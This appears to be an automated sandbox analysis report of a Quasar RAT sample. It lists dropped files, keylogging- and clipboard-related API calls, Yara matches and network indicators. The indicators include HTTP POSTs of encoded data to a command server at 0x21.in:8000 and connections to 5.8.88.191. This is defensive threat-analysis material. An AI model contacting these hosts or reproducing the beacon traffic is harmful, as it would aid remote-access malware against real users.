Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,

Networking:

Uses known network protocols on non-standard ports

Show sources

Source: unknown

Network traffic detected: HTTP traffic on port 49743 -> 8000

May check the online IP address of the machine

Show sources

Source: C:\Users\user\AppData\Local\Temp\windef.exe	DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: POST /_az/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 0x21.in:8000Content-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: global traffic	TCP traffic: 192.168.2.4:49743 -> 50.17.5.224:8000
Source: global traffic	TCP traffic: 192.168.2.4:49745 -> 5.8.88.191:8080

Source: CVbJSUXraQ.exe, 00000007.00000002.943097496.0000000003320000.00000004.00000001.sdmp	String found in binary or memory: http://0x21.in:8000/_az/
Source: windef.exe	String found in binary or memory: http://api.ipify.org/
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org/3
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: http://freegeoip.net/xml/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com40l
Source: windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	String found in binary or memory: https://dotbit.me/a/

Source: unknown

DNS traffic detected: queries for: 0x21.in

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C6B070 socket,connect,setsockopt,send,recv,shutdown,closesocket,HeapFree,

Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191

Source: unknown

HTTP traffic detected: POST /_az/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 0x21.in:8000Content-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: dropped/vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C83A94 GetWindowLongPtrA,SendNotifyMessageA,GetClipboardOwner,OpenClipboard,GetClipboardData,GlobalLock,lstrlenA,lstrlenA,HeapAlloc,lstrlenA,lstrlenA,HeapFree,GlobalUnlock,CloseClipboard,SendNotifyMessageA,SetWindowLongPtrA,DefWindowProcA,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00ACCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

E-Banking Fraud:

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
